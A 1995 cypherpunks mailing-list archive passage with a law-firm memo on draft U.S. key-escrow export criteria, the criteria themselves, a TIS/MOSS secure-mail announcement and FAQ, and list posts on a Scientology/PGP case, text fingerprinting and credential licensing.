General reaction was mixed to the government's proposal.  Most heavy
industrial and commercial users of encryption seemed accepting of the
Administration's position.  To them this meant greater flexibility and
would mean that most larger systems could get export licenses for
64-bit-key systems and this would expand the capacity to sell larger
systems abroad.  This position was exemplified by Trusted Information
Systems (TIS), representatives of which spoke several times.  In a
presentation, Peter Dinsmore of TIS offered restatements of the
criteria to make them more commercially viable, and a set of "criteria
for the criteria," which are as follows:  1) don't specify commercial
criteria, 2) don't exceed the minimum, 3) don't allow criteria creep,
4) don't solve the dual-rogue problem, 5) don't over protect, and 6)
use generic nomenclature.  He recommended that criteria six and nine be
removed altogether, a view that was echoed by other participants.

The mass market software industry and the public interest groups were
very opposed to the Administration proposal.  They do not believe that
64-bit key is sufficient, and they do not believe that anyone will buy
U.S.-manufactured software with a key that is to be held by a third
party under at least some control by the government.  There was a fair
amount of confusion on the issue at the meeting, but it now seems clear
that the government would permit foreign escrow where there are
bi-lateral agreements with friendly nations.  In a presentation, Bob
Holleyman of the Business Software Alliance criticized the
Administration's failure to "liberalize export controls on generally
available software employing non-key escrow encryption."  Also, he
stated that the Administration's proposal and the draft criteria
"continue to reflect a misunderstanding of the market place and, if
implemented in anything like their current form, will prevent key
escrow encryption from ever being commercially adopted."  Mr. Holleyman
r

In addition, the representative of MCI strongly objected to the
proposal as an incursion into the private sector and as an impediment
to the development of a strong information infrastructure.  Encryption
guru Whit Diffie of Sun Micro Systems and others objected to the
proposal.

Danny Weitzner of the Center for Democracy and Technology said that CDT
was going to go to Congress and object to the implementation of this
proposal.  They thought that it was a bad deal and the government
should not be placed in the position of directing standards and
requiring back doors into encryption systems.

Discussion of Criteria Six, Seven and Eight

Following the industry presentations, participants divided into groups
to discuss various criteria.  The group that discussed criteria six,
seven and eight made the following observations and recommendations.

There seemed to be universal objection to criterion six.  This would
limit the interoperability of systems.  It effectively states that
exported 64-bit key cannot be used to decrypt messages that were
encrypted with a higher value.  This would make it very difficult for
U.S. companies to interact with foreign subsidiaries. The internet
would find great difficulty in connection with this criteria.

Regarding criterion seven, concern was raised that in the context of
e-mail, it would be onerous to do key escrow for every transmission.
Concern also was raised about maintaining the integrity of intellectual
property in instances in which the escrow agent is in a foreign
country.  In effect, when one chooses an escrow center, one also is
selecting a legal system.  A request was made for a supplemental
document explaining applicable existing laws.

Concern was raised that all of the criteria are focused on the voice
communication paradigm, rather than on the dynamic data communications
environment.  Laws also are focused on this paradigm, and law moves
slowly whereas computer technology moves rapidly.  In addition, the
criteria do not address varying international laws on issues such as
privacy.  Companies will have to comply with the laws of the strictest
countries.  Concern was raised that privacy considerations are not as
apparent in the criteria as ease of access by law enforcement
agencies.  Also, innocent parties could be de-escrowed.  In addition,
it was emphasized that encryption must not interfere with use of
existing software.  Information was requested on two encryption
schemes, Banker's Trust and Fortress.

It was recommended that the TIS restatement of criterion seven be
adopted.  This restatement is as follows:  "The key escrow mechanism
allows access to both sides of a simultaneous (i.e., two-way)
communication with only access to the decrypting information from one
of the users."  It also was recommended that for bi-directional
communications, both parties negotiate a common key and escrow it, and
that for one way communications, the sender select the escrow key.

Regarding criterion eight, it was agreed that the technology issues,
international issues, and privacy issues are the same as those for
criterion seven.  It was noted that certain implementations would
require escrowing of the session key, which is unrealistic.  It was
agreed that with one court order, law enforcement agencies should have
the ability to decrypt a stream of messages.  However, there must be a
time limit on decryption.  It was agreed that agents should be able to
implement an automated system.

General Review/Comments on All Criteria

Industry and government representatives met less formally with the
objective of reviewing each of the criteria and attempting to reconcile
differences.  However, this did not occur; instead, broader issues were
discussed.  There was a certain amount of tension during this session,
as each side complained that the other did not understand its needs.
Industry members said that it seemed that implementation of the draft
criteria, or a version thereof, is a foregone conclusion on the part of
government, without industry input concerning the entire concept.
Specifically, industry members challenged the 64-bit maximum as being
arbitrary and unnecessary.  They said that although 56-bit encryption
was discussed with government last year, technology moves rapidly, and
now 64 bits are not enough.  A NIST representative countered that the
National Security Agency is "putting a big card on the table" with 64
bits.

Industry members also protested that the criteria do not meet the needs
of the global marketplace.  Consumers will not buy products designed to
meet these criteria because they already have access to 64-bit
encryption with no keys either free or at a low cost.  They argued that
the scope of the criteria (e.g., criterion nine) is broader than the
stated objective of exportability, and requested more information as to
why each criterion is being proposed.  Concern also was raised that
foreign countries with bi-lateral agreements with the U.S. will act
against U.S. key escrow agents.  Also, industry will not know the terms
of these agreements.

Export Procedures

Officials of Department of State and the Department of Commerce
explained in general terms how this program would work.  Each
application would go first to the State Department for a jurisdictional
certification on technical aspects.  If State were satisfied that the
criteria had been met, then it would certify the application over to
the Commerce Department for general licensing procedures.  There would
also be an escrow package, that would have to be certified.  It was not
clear who would control the certification of escrow agents.

Escrow Agents

The issue of who could be an escrow agent and how they would be
controlled was discussed, but not resolved.  The issues of liability
for wrongful release, the conditions of release, and related questions
were not resolved.  It seemed clear to me that escrow agents would have
to be independent of the user entity.  If this law firm were to use an
encryption package in its London office, the key would have to be
placed with a third party.

Conclusion

While no issues were resolved at the meeting, it provided a valauble
forum for the exchange of ideas between government and industry.  Focus
now turns to Congress, and to the crafting of a constructive response
to the upcoming Federal Register notice.  The Administration seems open
to changes.  The mass market software industry and the public interest
community seem negative.  We will continue to keep you informed.


--- Draft Export Criteria ---
for Software Key Escrow Encryption

Software key escrow encryption products meeting the following criteria
will be granted special export licensing treatment similar to that
afforded other mass-market software products with encryption.

1.      The product will use an unclassified encryption algorithm
(e.g., DES, RC4) with a key length not to exceed 64 bits.

2.      The product shall be designed to prevent multiple encryption
(e.g., triple-DES).

3.      The key required to decrypt each message or file shall be
accessible through a key escrow mechanism in the product, and such keys
will be escrowed during manufacture in accordance with #10.  If such
keys are not escrowed during manufacture, the product shall be
inoperable until the key is escrowed in accordance with #10.

4.      The key escrow mechanism shall be designed to include with each
encrypted message or file, in a format accessible by authorized
entities, the identity of the key escrow agent(s), and information
sufficient for the escrow agent(s) to identify the key or key
components required to decrypt that message.

5.      The product shall be resistant to any alteration that would
disable or circumvent the key escrow mechanism, to include being
designed so that the key escrow mechanism cannot be disabled by a
static patch, (i.e., the replacement of a block of code by a modified
block).

6.      The product shall not decrypt messages or files encrypted by
non-escrowed products, including products whose key escrow mechanisms
have been altered or disabled.

7.      The key escrow mechanism allows access to a user's encrypted
information regardless of whether that user is the sender or the
intended recipient of the encrypted information.

8.      The key escrow mechanism shall not require repeated involvement
by the escrow agents for the recovery of multiple decryption keys
during the period of authorized access.

9.      In the event any such product is or may be available in the
United States, each production copy of the software shall either have a
unique key required for decrypting messages or files that is escrowed
in accordance with #10, or have the capability for its escrow mechanism
to be rekeyed and any new key to be escrowed in accordance with #10.

10.     The product shall accept escrow of its key(s) only with escrow
agents certified by the U.S. Government or by foreign governments with
which the U.S. Government has formal agreements consistent with U.S.
law enforcement and national security requirements.

Note:  Software products incorporating additional encryption methods
other than key escrow encryption methods will be evaluated for export
on the basis of each encryption method included, as is already the case
with existing products.  Accordingly, these criteria apply only to the
key escrow encryption method incorporated by a software product, and
not to other non-escrowed encryption methods it may incorporate.  For
instance, non-escrowed encryption using a key length of 40 bits or less
will continue to be exportable under existing export regulations.

-

Please also review discussion paper #1 (distributed earlier), which
raises a number of issues involving exportability criteria and how
exportable products could be designed.  Discussion paper #2 (also
previously distributed) presents questions involving key escrow
agents.

~WASH01A:49767:1:|09/11/95
1-10




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 13 Sep 95 16:20:57 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <TuNUwkkAsKkR084yn@ouray.cudenver.edu>
Message-ID: <Pine.SUN.3.91.950913192002.7390A-100000-100000-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 8 Sep 1995, Alan Westrope wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Tonight's local news included an interesting blurb about this case.
> The judge refused to order Wollersheim to disclose his passphrase,
> since the encrypted material comprised names of Co$ critics
> who could then be targeted by the Church.  And the secret (and
> copyright!) $criptures were read in court and excerpts broadcast
> on the news, "close-captioned for the hearing-impaired."

Anyone have the name of this action, the court it was in or the name of 
the judge?  I would very much like to see a transcript of his order.

> 
> All the entertaining stuff some of us have been reading on the
> net was there:  aliens transported to earth, volcanoes h-bombed,
> thetans...I laughed my ass off.  A bigtime win for PGP and encryption
> generally, and a major PR debacle for the $cienos.
> 
> Kute Korrespondences Koda:
> 
> Tomorrow, Sept. 9, there will be protests worldwide at Co$ centers.
> I was cleaning out some paperwork and disk file archives recently,
> and noticed that the ViaCrypt and Austin Code Works subpoenas were
> dated Sept. 9, 1993.  Grady Ward of ACW has, of course, been a
> major Co$ antagonist, making good use of PGP and the Cypherpunks
> remailers.  The old message I found detailing these subpoenas was
> from this list's sometime visionary, L. Detweiler.
> 
> Alan Westrope                  <awestrop@nyx10.cs.du.edu>
> __________/|-,                 <adwestro@ouray.cudenver.edu>
>    (_)    \|-'                  2.6.2 public key: finger / servers
> PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMFDh51RRFMq4NZY5AQEO/gP/VgOEP8LpcrrIno2yj3oqD7zHc3a0d5If
> GC/ze1b6frpWPKo2mIb7IiZQzQ8rkZmky07PR9MV6jPO4S8UCpwix/ylgV1kGWmd
> WWWe4t8xVfHc2wJGS7qjRvkt8PDvgPkcHWktxOHkASl9cemscwYJbGyXq1BkCJCT
> Mkgv7cSClDM=
> =Nuz5
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 13 Sep 95 19:26:27 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
Message-ID: <ac7ce20d1c021004b016@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:57 AM 9/14/95, Bill Stewart wrote:

>Is Wavy Gravy running his "Nobody for President" campaign again this time?
>After all, Nobody's going to balance the budget, and Nobody's going to
>get the government out of your bedroom, and on the internet, Nobody can tell
>if you're a dog or not :-)

Or to update it for today:

"Nobody@remailer.org for President."


--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 13 Sep 95 16:36:28 PDT
To: cypherpunks@toad.com
Subject: MOSS [IETF privacy-enhanced mail, modified for MIME] now available
Message-ID: <9509132335.AA05053@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From pem-dev-request@neptune.tis.com Wed Sep 13 19:27:35 1995
Message-Id: <9509132011.AA19261@tis.com>
Reply-To: James M Galvin <tismoss-support@TIS.COM>
To: "MOSS.Announce.List":;, tis.com@TIS.COM
Subject: ANNOUNCE: TIS/MOSS Version 7.1
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0"
Content-Id: <2977.811023088.1@tis.com>
Date: Wed, 13 Sep 1995 16:11:35 -0400

------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <2977.811023088.2@tis.com>

Trusted Information Systems, Inc. (TIS), in cooperation with RSA Data
Security, Inc. (RSADSI), is pleased to provide TIS/MOSS, a reference
implementation of MIME Object Security Services (MOSS).  TIS/MOSS is a
security toolkit that provides digital signature and encryption services
for MIME objects.  TIS/MOSS includes the "glue" necessary for
integration with Version 6.8.3 of the Rand MH Message Handling System,
in addition to generic Bourne shell scripts that make it possible to use
it with email user agents supporting UNIX shell escapes.

In order to foster acceptance of MOSS and provide the community with a
usable, working version of this technology, TIS/MOSS is being made
available for broad use on the following basis.

TIS/MOSS is distributed in source code form, with all modules written in
the C programming language.  It runs on many UNIX derived platforms.  It
includes a DOS compilation directive that facilitates its port to
DOS/WINDOWS.

TIS/MOSS requires RSAREF, a cryptographic toolkit distributed by RSADSI.
TIS/MOSS makes use of undocumented features of RSAREF.  RSADSI has given
permission for users of TIS/MOSS to use these features, subject to the
terms and conditions of both the TIS/MOSS and RSAREF licenses, as
distributed with each software package.

TIS/MOSS is a product of Trusted Information Systems, Inc.  It may be
used by organizations and users for exchanging MOSS email messages,
subject to the terms and conditions of its license.  Enclosed below is
the MOSS Frequently Asked Questions, which includes instructions on how
to retrieve the software.

TIS/MOSS is export controlled by the U.S. Government.  As a result it is
only available to U.S. and Canadian sites and individuals.  Please see
the FAQ for more information.

------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <2977.811023088.3@tis.com>
Content-Description: TIS/MOSS FAQ


		  TIS/MOSS Frequently Asked Questions
			 Last Updated July 1995
	 Send questions and comments to tismoss-support@tis.com

Questions answered:

   1) What is MIME Object Security Services (MOSS)?
   2) What is MIME?
   3) How does MOSS compare to PGP and PEM?
   4) Where is the MOSS standard defined?
   5) Are there implementations of MOSS available?
   6) How do I get TIS/MOSS?
   7) Why is TIS/MOSS only available in the US and Canada?
   8) Are special privileges (e.g., root access) required to install
      TIS/MOSS?
   9) What about integrating TIS/MOSS into email user agents?
  10) What about DOS and other non-UNIX platforms?
  11) Is there a forum for MOSS users and developers?
  12) What about certificates?
  13) What is the Internet Certification hierarchy?
  14) What if I have questions or problems with TIS/MOSS?

 * means that this entry has been recently updated.
 + means that this entry has been added recently.


1
Q: What is MIME Object Security Services (MOSS)?

A: MOSS is a Privacy Enhanced Mail (PEM) derivative that is a Proposed
   Internet Standard for adding security services to Multi-purpose
   Internet Mail Extensions (MIME).  It uses the cryptographic
   techniques of digital signature and encryption to provide origin
   authentication, integrity, and confidentiality to MIME objects.
   Users of MOSS can know who originated a message, that the message
   has not been changed enroute, and that the message was kept secret
   from everyone except the intended recipients.

   MOSS depends on the existence of public/private key pairs to support
   its security services.  Users must exchange public keys with those
   other users with whom they wish to exchange MOSS email.  This may be
   accomplished manually, via mechanisms available in the protocol, via
   X.509 certificates, or any other suitable mechanism.

2
Q: What is MIME?

A: MIME is an Internet Standard (RFC 1521) that defines the format of
   email message bodies to allow multi-part textual and non-textual
   message bodies to be represented and exchanged without loss of
   information.  MIME does for message bodies what RFC822 does for
   message headers.

3
Q: How does MOSS compare to PGP and PEM?

   PGP can provide the same services but since it is not integrated with
   MIME the interpretation of the protected content is necessarily user
   controlled.  Note, however, that MIME can carry a PGP object.

   MOSS is a PEM derivative.  It integrates the security services of PEM
   with MIME, taking advantage of the extensive structuring and
   formatting facilities of MIME, limited versions of which are
   necessarily an integral part of the PEM specifications.

4
Q: Where is the MOSS standard defined?

A: There is a Proposed Standard published as an RFC that specifies MOSS.
   This document may be found in your favorite RFC repository.
   Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
   an EMAIL message to "rfc-info@ISI.EDU" with the message body "help:
   ways_to_get_rfcs".  For example:

        To: rfc-info@ISI.EDU
        Subject: getting rfcs

        help: ways_to_get_rfcs

5
Q: Are there implementations of MOSS available?

A: Yes, Trusted Information Systems (TIS), under ARPA sponsorship, has
   released a reference implementation of MOSS (TIS/MOSS) to the
   Internet community.

   TIS/MOSS is a UNIX-based implementation that is easily integrated
   with email user agents.  The source code is openly available in the
   United States and Canada for non-commercial use.  The current version
   of TIS/MOSS is 7.1.

   Vendors interested in including TIS/MOSS in their products or
   integrating it with their services should contact Trusted Information
   Systems about licensing Trusted Mail (tm) by sending email to
   tismoss-support@tis.com.

6
Q: How do I get TIS/MOSS?

A: TIS/MOSS is available via anonymous ftp in the United States and
   Canada to US and Canadian citizens and people with a US "green
   card."  To retrieve TIS/MOSS please FTP to

     host:   ftp.tis.com
     login:  anonymous

   and retrieve the files

     pub/MOSS/README
     pub/MOSS/LICENSE
     pub/MOSS/BUGS

   The README file contains further instructions.  

7
Q: Why is TIS/MOSS only available in the US and Canada?

A: The export from the United States of the cryptography used in
   TIS/MOSS is controlled by the United States government.

8
Q: Are special privileges (e.g., root access) required to install TIS/MOSS?

A: No.

9
Q: What about integrating TIS/MOSS into email user agents?

A: TIS/MOSS includes "glue", in the form of shell scripts, to integrate
   it with the Rand MH Message Handling System version 6.8.3.  It also
   includes generic scripts that make the services accessible to any
   UNIX application that supports shell escapes.  If you integrate
   TIS/MOSS with a popular email user agent, we would be happy to make
   it available to others.

10
Q: What about DOS and other non-UNIX platforms?

A: TIS/MOSS has been ported to DOS and includes a DOS compiler option
   that may be set to facilitate its installation in DOS environments.
   It has also been ported to Macintosh although it does not yet include
   a MAC compiler option.  If you port TIS/MOSS to other platforms, we
   would be happy to make the changes available to others.

11
Q: Is there a forum for MOSS users and developers?

A: Yes, there is an email list for users of TIS/MOSS called
   "tismoss-users@tis.com".  To get added to the list send a message to
   "tismoss-users-request@tis.com".

   There is an email list for implementors and discussions of the MOSS
   specifications called "pem-dev@tis.com".  This list originated with
   the PEM protocol, from which MOSS is derived.  To get added to the
   list send a message to "pem-dev-request@tis.com".

12
Q: What about certificates?

A: TIS/MOSS supports the use of X.509 certificates including creation,
   validation, certificate revocation lists, distribution, and
   destruction.  Users may embody their public key in a certificate and
   may participate in the Internet certification hierarchy or some other
   private hierarchy.  TIS/MOSS neither requires nor enforces any
   certification hierarchy policy.

13
Q: What is the Internet Certification hierarchy?

A: The Internet Certification hierarchy is defined by RFC1422.  It is a
   tree structured hierarchy of certificates with a single, global root
   called the Internet PCA Registration Authority (IPRA).  The IPRA
   issues certificates to Policy Certification Authorities (PCAs) who
   issue certificates to Certification Authorities (CAs) who may issue
   certificates to users or subordinate CAs.  Identities are based on
   distinguished names and there are restrictions on their form and
   content.

   For more information on becoming a PCA see the IPRA WWW page at:

	http://bs.mit.edu:8001/ipra.html

   or contact the IPRA at:

	ipra-info@isoc.org

   For more information on becoming a CA under the TIS PCA contact:

	tispca-info@tis.com

14
Q: What if I have questions about or problems with TIS/MOSS?

A: Send them to "tismoss-support@tis.com".

------- =_aaaaaaaaaa0
Content-Type: multipart/signed; protocol="application/moss-signature";
	micalg="md5"; boundary="----- =_aaaaaaaaaa1"

------- =_aaaaaaaaaa1
Content-Type: text/plain; charset="us-ascii"
Content-ID: <2977.811023088.5@tis.com>

Trusted Information Systems, Inc. (TIS), in cooperation with RSA Data
Security, Inc. (RSADSI), is pleased to provide TIS/MOSS, a reference
implementation of MIME Object Security Services (MOSS).  TIS/MOSS is a
security toolkit that provides digital signature and encryption services
for MIME objects.  TIS/MOSS includes the "glue" necessary for
integration with Version 6.8.3 of the Rand MH Message Handling System,
in addition to generic Bourne shell scripts that make it possible to use
it with email user agents supporting UNIX shell escapes.

In order to foster acceptance of MOSS and provide the community with a
usable, working version of this technology, TIS/MOSS is being made
available for broad use on the following basis.

TIS/MOSS is distributed in source code form, with all modules written in
the C programming language.  It runs on many UNIX derived platforms.  It
includes a DOS compilation directive that facilitates its port to
DOS/WINDOWS.

TIS/MOSS requires RSAREF, a cryptographic toolkit distributed by RSADSI.
TIS/MOSS makes use of undocumented features of RSAREF.  RSADSI has given
permission for users of TIS/MOSS to use these features, subject to the
terms and conditions of both the TIS/MOSS and RSAREF licenses, as
distributed with each software package.

TIS/MOSS is a product of Trusted Information Systems, Inc.  It may be
used by organizations and users for exchanging MOSS email messages,
subject to the terms and conditions of its license.  Enclosed below is
the MOSS Frequently Asked Questions, which includes instructions on how
to retrieve the software.

TIS/MOSS is export controlled by the U.S. Government.  As a result it is
only available to U.S. and Canadian sites and individuals.  Please see
the FAQ for more information.

------- =_aaaaaaaaaa1
Content-Type: application/moss-signature
Content-ID: <2977.811023088.4@tis.com>
Content-Transfer-Encoding: quoted-printable

Version: 5
Originator-ID: PK,MHkwCgYEVQgBAQICAwADawAwaAJhAMAHQ45ywA357G4fqQ61aoC1fO6B=
ekJmG4475mJkwGIUxvDkwuxe/EFdPkXDGBxzdGrW1iuh5K8kl8KRGJ9wh1HU4TrghGdhn0Lw8g=
G67Dmb5cBhY9DGwq0CDnrpKZV3cQIDAQAB,EN,2,galvin@tis.com
MIC-Info: RSA-MD5,RSA,jZjz1ope/QCf2IwPfkXfB+0bNJsFqJny+xVqjyFaW6QAY0Oy4dru=
PxTgYleEFG2qQBP6rbNiucG7g254ClV6hUMG6ksd+qFioFvxqsJ15WylN7Addo/QCzknzhRo45=
6l

------- =_aaaaaaaaaa1--

------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <2977.811023088.6@tis.com>
Content-Description: TIS/MOSS FAQ


		  TIS/MOSS Frequently Asked Questions
			 Last Updated July 1995
	 Send questions and comments to tismoss-support@tis.com

Questions answered:

   1) What is MIME Object Security Services (MOSS)?
   2) What is MIME?
   3) How does MOSS compare to PGP and PEM?
   4) Where is the MOSS standard defined?
   5) Are there implementations of MOSS available?
   6) How do I get TIS/MOSS?
   7) Why is TIS/MOSS only available in the US and Canada?
   8) Are special privileges (e.g., root access) required to install
      TIS/MOSS?
   9) What about integrating TIS/MOSS into email user agents?
  10) What about DOS and other non-UNIX platforms?
  11) Is there a forum for MOSS users and developers?
  12) What about certificates?
  13) What is the Internet Certification hierarchy?
  14) What if I have questions or problems with TIS/MOSS?

 * means that this entry has been recently updated.
 + means that this entry has been added recently.


1
Q: What is MIME Object Security Services (MOSS)?

A: MOSS is a Privacy Enhanced Mail (PEM) derivative that is a Proposed
   Internet Standard for adding security services to Multi-purpose
   Internet Mail Extensions (MIME).  It uses the cryptographic
   techniques of digital signature and encryption to provide origin
   authentication, integrity, and confidentiality to MIME objects.
   Users of MOSS can know who originated a message, that the message
   has not been changed enroute, and that the message was kept secret
   from everyone except the intended recipients.

   MOSS depends on the existence of public/private key pairs to support
   its security services.  Users must exchange public keys with those
   other users with whom they wish to exchange MOSS email.  This may be
   accomplished manually, via mechanisms available in the protocol, via
   X.509 certificates, or any other suitable mechanism.

2
Q: What is MIME?

A: MIME is an Internet Standard (RFC 1521) that defines the format of
   email message bodies to allow multi-part textual and non-textual
   message bodies to be represented and exchanged without loss of
   information.  MIME does for message bodies what RFC822 does for
   message headers.

3
Q: How does MOSS compare to PGP and PEM?

   PGP can provide the same services but since it is not integrated with
   MIME the interpretation of the protected content is necessarily user
   controlled.  Note, however, that MIME can carry a PGP object.

   MOSS is a PEM derivative.  It integrates the security services of PEM
   with MIME, taking advantage of the extensive structuring and
   formatting facilities of MIME, limited versions of which are
   necessarily an integral part of the PEM specifications.

4
Q: Where is the MOSS standard defined?

A: There is a Proposed Standard published as an RFC that specifies MOSS.
   This document may be found in your favorite RFC repository.
   Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
   an EMAIL message to "rfc-info@ISI.EDU" with the message body "help:
   ways_to_get_rfcs".  For example:

        To: rfc-info@ISI.EDU
        Subject: getting rfcs

        help: ways_to_get_rfcs

5
Q: Are there implementations of MOSS available?

A: Yes, Trusted Information Systems (TIS), under ARPA sponsorship, has
   released a reference implementation of MOSS (TIS/MOSS) to the
   Internet community.

   TIS/MOSS is a UNIX-based implementation that is easily integrated
   with email user agents.  The source code is openly available in the
   United States and Canada for non-commercial use.  The current version
   of TIS/MOSS is 7.1.

   Vendors interested in including TIS/MOSS in their products or
   integrating it with their services should contact Trusted Information
   Systems about licensing Trusted Mail (tm) by sending email to
   tismoss-support@tis.com.

6
Q: How do I get TIS/MOSS?

A: TIS/MOSS is available via anonymous ftp in the United States and
   Canada to US and Canadian citizens and people with a US "green
   card."  To retrieve TIS/MOSS please FTP to

     host:   ftp.tis.com
     login:  anonymous

   and retrieve the files

     pub/MOSS/README
     pub/MOSS/LICENSE
     pub/MOSS/BUGS

   The README file contains further instructions.  

7
Q: Why is TIS/MOSS only available in the US and Canada?

A: The export from the United States of the cryptography used in
   TIS/MOSS is controlled by the United States government.

8
Q: Are special privileges (e.g., root access) required to install TIS/MOSS?

A: No.

9
Q: What about integrating TIS/MOSS into email user agents?

A: TIS/MOSS includes "glue", in the form of shell scripts, to integrate
   it with the Rand MH Message Handling System version 6.8.3.  It also
   includes generic scripts that make the services accessible to any
   UNIX application that supports shell escapes.  If you integrate
   TIS/MOSS with a popular email user agent, we would be happy to make
   it available to others.

10
Q: What about DOS and other non-UNIX platforms?

A: TIS/MOSS has been ported to DOS and includes a DOS compiler option
   that may be set to facilitate its installation in DOS environments.
   It has also been ported to Macintosh although it does not yet include
   a MAC compiler option.  If you port TIS/MOSS to other platforms, we
   would be happy to make the changes available to others.

11
Q: Is there a forum for MOSS users and developers?

A: Yes, there is an email list for users of TIS/MOSS called
   "tismoss-users@tis.com".  To get added to the list send a message to
   "tismoss-users-request@tis.com".

   There is an email list for implementors and discussions of the MOSS
   specifications called "pem-dev@tis.com".  This list originated with
   the PEM protocol, from which MOSS is derived.  To get added to the
   list send a message to "pem-dev-request@tis.com".

12
Q: What about certificates?

A: TIS/MOSS supports the use of X.509 certificates including creation,
   validation, certificate revocation lists, distribution, and
   destruction.  Users may embody their public key in a certificate and
   may participate in the Internet certification hierarchy or some other
   private hierarchy.  TIS/MOSS neither requires nor enforces any
   certification hierarchy policy.

13
Q: What is the Internet Certification hierarchy?

A: The Internet Certification hierarchy is defined by RFC1422.  It is a
   tree structured hierarchy of certificates with a single, global root
   called the Internet PCA Registration Authority (IPRA).  The IPRA
   issues certificates to Policy Certification Authorities (PCAs) who
   issue certificates to Certification Authorities (CAs) who may issue
   certificates to users or subordinate CAs.  Identities are based on
   distinguished names and there are restrictions on their form and
   content.

   For more information on becoming a PCA see the IPRA WWW page at:

	http://bs.mit.edu:8001/ipra.html

   or contact the IPRA at:

	ipra-info@isoc.org

   For more information on becoming a CA under the TIS PCA contact:

	tispca-info@tis.com

14
Q: What if I have questions about or problems with TIS/MOSS?

A: Send them to "tismoss-support@tis.com".

------- =_aaaaaaaaaa0--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 13 Sep 95 16:49:24 PDT
To: cypherpunks@toad.com
Subject: Text tracking
In-Reply-To: <QQzgrh03331.199509110422@relay3.UU.NET>
Message-ID: <Pine.SUN.3.91.950913194148.7390C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 11 Sep 1995 owner-cypherpunks@toad.com wrote:

>   Hal Finney wrote:
> 
> > I'm not sure how to do it for software, but for novels it
> > should be easy to fingerprint.  Every couple of pages the
> > author writes a sentence twice in different forms.  This would
> > not take a great deal of extra effort on the part of the
> > author.
> 
>   Perhaps.  Some authors might be offended by the idea that
> using a different form of a sentence doesn't affect the work.

Examples of "text tracking" in documents where language specificity is 
important (legal, scientific) are typically marked with changes in the 
justification scheme, i.e. the number of spaces to the right, number of 
lines to a page, number of pages total, etc. etc.

Clearly it is much more difficult to apply in digital schemes, but 
consider that in order to modify the scheme to avoid traceback to the 
distributer, one of two conditions must exist.

1>  The distributer must be close to the initial release point.

  (If not, then all documents ABOVE the distributer in the chain will be 
   text tracked, and all the documents BELOW the distributer will not.  
   Clearly this will brand the distributer).

2>  The distributer must be entirely outside the 'legal' distribution scheme.

Remember also that uniform modification of text tracking methods is 
itself identifying unless several 'illegal' distributers are using the 
same sanitizing method.

The same way you can get surgery to have fingerprints removed, but the 
resulting scars make you all the more identifiable.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 13 Sep 95 17:30:55 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <v01510101ac7d199d2ae0@[198.59.115.138]>
Message-ID: <Pine.SUN.3.91.950913200706.7390D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Dar Scott wrote:

> Black Unicorn wrote,
> >But won't clients insist on proper credentials in one form or another?
> 
>      Yes.
> 
> >Doesn't the practicality and accountability of a centralized authority
> >(or several authorities) provide the best answer to this?
> 
>      No.
> 
> >Who is going
> >to accept my signature promising that I did indeed get a law degree and
> >pass the bar?
> 
>      Very few.
> 
>      Certification can be from multiple private and
>      government organizations and might vary depending
>      on the type of legal service (or other lawyer service)
>      needed.

Didn't I just say this above?

A centralized, or several centralized authorities.

I guess the center of my question is, how can you apply Web of Trust to 
e.g. a university degree.  Who cares what Bob and Alice think my degree 
is in, the client only wants to know from the institution.

  Licensing can only be done by an
>      entity that can use physical force to prevent
>      buying and selling legal services.

I believe you are incorrect, but I guess my main concern is your 
characterization of "Physical force."  I am assuming you mean coercion, 
and not that you will be jailed or such (though this may be the case).

I would argue that as long as coercion exists (violence of any type, 
physical or not) you have a licensing authority.  Take the hollywood 
blacklist.  No one actually pushed around suspected pinko screenwriters 
(well, at least, if anyone did, it was incendential) but they certainly 
faced a great deal of persuasive motivation.  Look at the committee as 
the licensing authority here.  (Licensing you as a non-communist as it were).

If several governmental and private authorities were in the practice of 
certifing that Bob has a law degree from Tremont University, and that he 
is competent to practice in D.C., and given that the citizens of D.C. 
will look for these credentials, isn't this a license?  Afterall, Bob has 
to pass some test or requirement to get the signatures.  Isn't this 
coercion in your definition?  Can't the multiple authorities set common 
or near common guidelines?  Rather, don't they HAVE to in order to have 
their signatures worth the electrons they are transmitted with?

If you take the exteme position you seem to, there's an antitrust case here.

Am I not "licensing" my key signature to people provided they pass my key 
signature criteria?  Am I not doing violence by withholding my signature 
and the benefits it might convey for certain "terms?"

In this definition, all trusted authorities are by definition licensing.  

Either their signature is worth nothing, and thus they are not coercive by 
